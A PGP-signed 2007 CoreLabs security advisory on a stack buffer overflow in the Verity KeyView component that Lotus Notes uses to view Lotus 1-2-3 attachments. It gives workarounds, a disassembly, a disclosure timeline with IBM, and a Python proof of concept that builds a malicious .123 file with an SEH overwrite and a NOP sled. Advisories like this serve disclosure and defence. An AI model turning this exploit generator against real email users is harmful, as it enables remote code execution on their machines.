-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies ?? CoreLabs Advisory http://www.coresecurity.com/corelabs Lotus Notes buffer overflow in the Lotus WorkSheet file processor *Advisory Information* Title: Lotus Notes buffer overflow in the Lotus WorkSheet file processor Advisory ID: CORE-2007-0821 Advisory URL: http://www.coresecurity.com/index.php5?action=item&id=2008 Date published: 2007-11-27 Date of last update: 2007-11-27 Vendors contacted: IBM Corp. Release mode: COORDINATED RELEASE *Vulnerability Information* Class: Input validation error Remotely Exploitable: Yes Locally Exploitable: Yes Bugtraq ID: N/A CVE Name: N/A *Vulnerability Description* Lotus Notes is the integrated email, calendar, instant messenger, browser and business collaboration application developed by IBM to work as a desktop client in conjunction with IBM??s Lotus Domino server application. The email functionality of Lotus Notes supports previewing and processing file attachments in various formats. To preview and process files in the Lotus Worksheet File format (WKS) used by Lotus 1-2-3 the email client uses a library from a third-party software vendor (Autonomy??s Verity KeyView SDK). Several buffer overflow vulnerabilities were found in the third-party library used by Lotus Notes to process Lotus 1-2-3 file attachments. These vulnerabilities could allow attackers to remotely execute arbitrary commands on vulnerable systems by attaching a specially crafted file that triggers exploitation when unsuspecting users attempt to ??View?&#157; the attachment. Exploitation of these vulnerabilities requires user intervention. Although these specific vulnerabilities exist on a third??party component the problem is compound by the way Lotus Notes displays information about attachments, making it easier to elicit unsuspecting assistance from the users to exploit them. Lotus Notes displays the file type and corresponding icon based on the attached file??s extension rather than the MIME Content-Type header in the email whereas the view functionality is handled by the Verity KeyView component which processes the attachment based on the file contents. Exploitation of these vulnerabilities requires end-user interaction but the discrepancy described above could allow an attacker to send a malicious Lotus 1-2-3 file as an attachment with a seemingly innocuous extension (for example, .JPG or .GIF) that more easily lure users into viewing it thus making it easier to succeed in the exploitation attempt. These vulnerabilities have been discovered and tested using Lotus Notes and the Verity KeyView SDK components it uses but other applications that use the Verity KeyView SDK may be also vulnerable. *Vulnerable packages* - Lotus Notes version 7.x - Lotus Notes version 8.x (not confirmed by Core) - Lotus Notes version 6.5.6 (not confirmed by Core) - Other software packages using Verity KeyView SDK using vulnerable versions of l123sr.dll *Non-vulnerable packages* N/A *Solution/Vendor Information/Workaround* Lotus Notes customers should follow the instructions of the following support Technote, which outlines the available options based on specific versions of Lotus Notes: http://www.ibm.com/support/docview.wss?rs=475&uid=swg21285600 Workaround 1: Delete the keyview.ini file in the Notes program directory. This disables ALL viewers. When a user clicks View (for any file), a dialog box will display with the message "Unable to locate the viewer configuration file.". Workaround 2: Delete the problem file l123sr.dll file. When a user tries to view the specific file type, a dialog box will display with the message "The viewer display window could not be initialized." All other file types work without returning the error message. Workaround 3: Comment out specific lines in keyview.ini for any references to the problem file (l123sr.dll). To comment a line, you precede it with a semi-colon (;). When a user tries to view the specific file type, a dialog box will display with the message "The viewer display window could not be initialized". For example: [KVWKBVE] ;81.2.0.5.0=l123sr.dll ;81.2.0.9.0=l123sr.dll Workaround 4: Filter inbound emails with attachments with potentially malicious files. Lotus 1-2-3 files are usually associated to MIME Content-Type headers set to the following strings: application/lotus-1-2-3 application/lotus123 application/x-lotus123 application/wks application/x-wks application/vnd.lotus-1-2-3 Note however that workaround #4 is a simply stop gap measure that could be circumvented by relatively unsophisticated attackers. *Credits* This vulnerability was discovered by Sebasti??n Mu??iz from the CORE IMPACT Exploit Writers Team (EWT) *Technical Description* Lotus 1-2-3 and Lotus Symphony spreadsheet applications use the Worksheet File format [1] to persist spreadsheet data on the file system. Lotus Notes uses a third-party library [2] to process file attachments in the Lotus Worksheet File format (WKS). A worksheet file in WKS format is simply a binary representation of the spreadsheet built using a sequence of binary records in the TLV form (Type-Length-Value) where both Type and Length are encoded using two bytes. There are multiple vulnerabilities in the way the Verity KeyView SDK DLL processes the TLV records of a worksheet file. These vulnerabilities stem from lack of proper consistency checks for the stated Length and the corresponding Value in several record Types. As an specific example for records of type SRANGE (0x001b) which can specify arbitrary lengths of data that the library attempt to copy in to a fixed length buffer in the stack is shown in following disassembled code: .text:02A87FD4 cmp eax, 1Bh .text:02A87FD7 jz loc_2A881C9 ... .text:02A881DC lea eax, [ebp+szVulnerableBuffer] .text:02A881E2 push edi ; length of read operation, taken from the file .text:02A881E3 push eax ; stack based buffer .text:02A881E4 mov eax, [ebp+0Ch] .text:02A881E7 push eax .text:02A881E8 call dword ptr [eax+24h] ; read function! When a field of type SRANGE (0x001b) is read the conditional jump at 0x02A87FD7 (jz 0x2A881C9) is taken. The destination buffer is cleared and the Length value for this record is read to process it. At address 0x2A881E2 edi (containing the Length of the TLV record) is pushed and then the read operation takes place at address 0x2A881E8 reading an arbitrary amount of bytes into a fixed size buffer in the stack. Thus a malicious Worksheet file can trigger execution of arbitrary code on vulnerable systems by exploiting the vulnerability using one of the appropriate exploitation techniques for stack-based buffer overflows. However, exploitation on a Lotus Notes email client requires that the user attempts to view the attached file following this steps: 1- Select email containing the attachment 2- Right-click on attachment 3- Select ??View?&#157; to open the file inside of Lotus Notes. Unfortunately, users can be lured into performing the steps above due to the fact that it is possible to send a malicious attachment with a seemingly innocuous file name and extension such and have the Lotus Note client show a graphic icon for the attachment that corresponds to the filename extension and not to the actual contents of the file. Proof of concept snippets The following snippet of Python code generates a .123 file that triggers the bug when it is processed by vulnerable versions of the library. The proof-of-concept file will only trigger an exception for debugging purposes (int 3) but it makes it evident that exploitation of the bug in order to execute any arbitrary code is possible. from sys import argv from struct import pack def createMaliciousFile(filename): seh_offset = 0x9c4 jumper = 0x06ad890d # pop pop ret ... CHANGE IT! (dll is rebased) shellcode = '\x90' * 0x400 + '\xCC' # nopsled and int 3 content = '\x00\x00' # header record type content += '\x1a\x00' # header length content += '\x05\x10\x04\x00\x00\x00\x00\x00\x09\x00\x00\x01' content += '\x01\x00\x30\x8d\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00' content += '\x1b\x00' # vulnerable record type payload = '' payload += '\x90' * (seh_offset - 4) #others too payload += '\xeb\x06\x90\x90' # jmp six bytes forward payload += pack('<L', jumper) payload += shellcode content += pack('<H', len(payload)) content += payload fd = open(filename, 'wb') fd.write(content) fd.close() if len(argv) is not 2: print '[-] Must specify a filename. Remember to change the pop pop ret address! :)' else: createMaliciousFile(argv[1]) *Report Timeline* 2007-09-13: Email to IBM AIX security requesting security contact information for Lotus Notes 2007-09-14: Reply from IBM AIX security team with contact information of the IBM Lotus Notes security team 2007-09-17: Email to IBM Lotus Notes security notifying Core??s intent to report the vulnerability in Lotus Notes and Autonomy??s KeyView SDK and requesting an acknowledgement within 2 business days indicating of whether further communications should be encrypted. Security advisory publication date set to October 15th. Security contact information for Autonomy??s KeyView requested. 2007-09-18: Response from Lotus Notes security providing public PGP key to encrypt further communications and inquiring is the publication date is flexible or fixed. 2007-09-18: Email from Core including details about the vulnerability in a draft advisory document. Core indicates that the publication date for the security advisory is flexible and could be changed (postponed or brought forward) on the basis of concrete and precise information about availability of fixes. Security contact information for Autonomy requested. 2007-09-19: Email from Lotus Notes security indicating that the bugs will be investigated and that will check and get back regarding the request contact of information for Autonomy. 2007-09-20: Email from Lotus Notes Security requesting proof-of-concept code to validate the finding. 2007-09-21: Proof-of-concept code and sample of a malicious file sent to Lotus Notes Security 2007-09-21: Email from Lotus Notes Security indicating that the proof-of-concept will be passed to the development team and contact information for Autonomy made available after verification. 2007-10-03: Email from Core requesting a status update and reminding Lotus Notes security that the disclosure date was originally set for October 15th. 2007-10-05: Email from Lotus Notes Security indicating that the vulnerability has been reproduced and a Lotus Software Problem Report has been issued. The issue has been logged with Autonomy and that currently there is no information available about how or when it will be fixed. 2007-10-17: Email from Core??s Security advisories team requesting a status update and indicating that the original date planned for publication of the advisory has already passed without any communication from IBM regarding the issue, let alone any concrete plans to fix the bug. The publication date for Core's security advisory has been re-scheduled for October 30th, 2007. The date remains flexible on the basis of receiving concrete and specific details about availability of fixes by Wednesday, October 24th. An up to date copy of the security advisory provided for comments and suggested workarounds. 2007-10-23: Email from Lotus Notes Security indicating that a ticket had been opened with Autonomy and that since this is a client-side issue the fix would be provided in one of the future maintenance releases of the Lotus Notes client. Ongoing work with Autonomy needs to continue before being able to confirm when the fix will be rolled into the product. 2007-10-23: Email from Core??s advisory team with follow up questions to Lotus Notes Security: 1. Is it official policy to include fixes to client-side vulnerabilities in maintenance releases? 2. What is the scheduled date for general availability of the next maintenance release? 3. Will the fix to the bugs reported in l123sl.dll be included in the next maintenance release? Core also highlights that at the same time that Lotus was notifying Core a maintenance release for Lotus Notes was released, fixing several bugs that are almost exactly the same as the ones Core reported [3]. Core indicates that while we appreciate involvement from Lotus Notes Security and the reassuring statements about how serious are the bugs taken at Lotus, Core considers concrete details and specific actions better indicators to assess how serious a vendor is. The fact that Lotus Notes didn??t even notify Core of such a highly relevant upcoming disclosure, (which included workarounds that could apply to the problem reported by Core) is a discouraging indicator. Furthermore, since Lotus Notes still hasn??t provided any specific timeline to release fixes and after analysis the timelines of the third party advisories of the recently disclosed vulnerabilities, a reasonable assessment based on evidence indicates and expectation of 10 months from the initial date of report to the vendor and a 7 months estimation since the vulnerability positive confirmation date. Based on that and the assessment that addressing the reported vulnerabilities requires a much faster pace for fixes, Core will proceed with the advisory release currently scheduled for October 30th, 2007. The workarounds already provided by Lotus for similar vulnerabilities will be included in Core??s advisory. Any official statements from the Lotus Notes team regarding workaround or availability of fixes should be received by COB Friday Oct. 26th. 2007-10-24: Email from Lotus Notes security indicating that included statements are not official. Answers to questions from Core??s email provided: 1. Yes, client-side fixes are included in Maint. Releases of Lotus Notes, Fix Packs are server-based. The bugs reported by core are on the client. 2. Target dates for maintenance releases provided (end of 2007, March 2008, 2009). 3. Still can??t confirm if the fix will be included and to what extent. Autonomy indicated that will ship a fix in version 10.3 which is shipping soon. Core was not notified of the planned release of similar client-side security fixes in the maintenance release to preserve confidentiality with other vulnerability reporters. Likewise Lotus Notes did not notify the others of Core??s similar report. Three versions of the Lotus Notes client are addressed by Core??s report. Also a partial chronology of the report timeline was provided. 2007-10-26: Confidential email received from Lotus Note Security 2007-10-26: Email from Core advisories team to Lotus Notes Security acknowledging reception of the previous email. Unfortunately it did not provide any specific details about a scheduled date for availability of fixes which is what Core needed to consider re-scheduling publication of its advisory. Core appreciates other party??s views regarding what constitutes responsible disclosure and but does not agree with any assessments indicating that the company is putting customers at risk. In fact Core??s views are that customers are already at risk due to vulnerabilities and that it is the lack of effective and timely response to mitigate a lack of sound security practices in the SDLC what puts customers at risk. Core??s advisory disclosure seek to inform and explain the situation to vulnerable users and to provide the details necessary to devise, deploy and test protection countermeasures until the vendor comes out with an official fix. Core believes that client-side vulnerabilities are increasingly important and merit the release of stand-alone, out of cycle patches rather the rolling fixes into maintenance releases. Core was expecting that fixes would be available within several weeks (rather than several months) of confirmation of the vulnerability. 2007-10-29: Email from Lotus Notes Security indicating that delaying publication of Core??s advisory for 30 days would provide enough time to release fixed. Coordinated release of fixes and information suggested for Nov. 27th, 2007. Official statement provided for Core??s advisory. Response from Core is expected by EOD. 2007-10-29: Email from Core??s advisory team indicating that now that a specific date for availability of fixes was provided Core is willing to reschedule publication of the advisory to November 27th, 2007. However, if there are any indications of the bug being exploited ??in the wild?&#157; information will be released immediately with a Forced Release mode. 2007-11-15: Email from Lotus Notes Security asking if we??re still on target for the Nov 27th release and requesting a URL to Core??s advisory and providing a link to Lotus Notes?? Technote regarding the issue. Question about how Core would like to be credited in the Technote. 2007-11-20: Last email from Lotus notes Security (2007-11-15) resent to Core??s advisories team. 2007-11-20: email from Core?? advisory team acknowledging reception of previous email and stating that Core is on track for the Nov 27th release. URL and credit discovery details provided. A brief description of the planned schedule on publication date included. 2007-11-21: Lotus Notes security acknowledges Core??s last email 2007-11-27: Email from Lotus Notes notifying of the release of the Technote concerning this issue. 2007-11-27: Email from Core??s advisories team sent to Lotus Notes Security with final draft of security advisory CORE-2007-0821 2007-11-27: CORE-2007-0821 advisory published *Additional Information/ Resources* [1] Lotus Staff, Worksheet File Formats, Addison-Wesley Longman Publishing Co., Inc., Boston, MA, 1987. [2] Verity KeyView SDK; http://www.verity.com/content/Products/KeyView/ [3] Client-side vulnerabilities disclosed in Lotus Notes on October 23rd, 2007 http://www-1.ibm.com/support/docview.wss?uid=swg21271111 http://www-1.ibm.com/support/docview.wss?uid=swg21272836 http://www-1.ibm.com/support/docview.wss?uid=swg21272930 http://www-1.ibm.com/support/docview.wss?uid=swg21270884 http://www-1.ibm.com/support/docview.wss?uid=swg21257030 http://www-1.ibm.com/support/docview.wss?uid=swg21271957 *About Corelabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/ *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *DISCLAIMER* The contents of this advisory are copyright (c) 2007 CORE Security Technologies and (c) 2007 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *PGP/GPG KEYS* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.a sc -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) iD8DBQFHTF/5yNibggitWa0RAnMYAJ9ocz6f9VMX71an/aF894VVnC8r8wCcD6z4 TiApSbVlTkuzhzskGfsDhzM= =v8sH -----END PGP SIGNATURE-----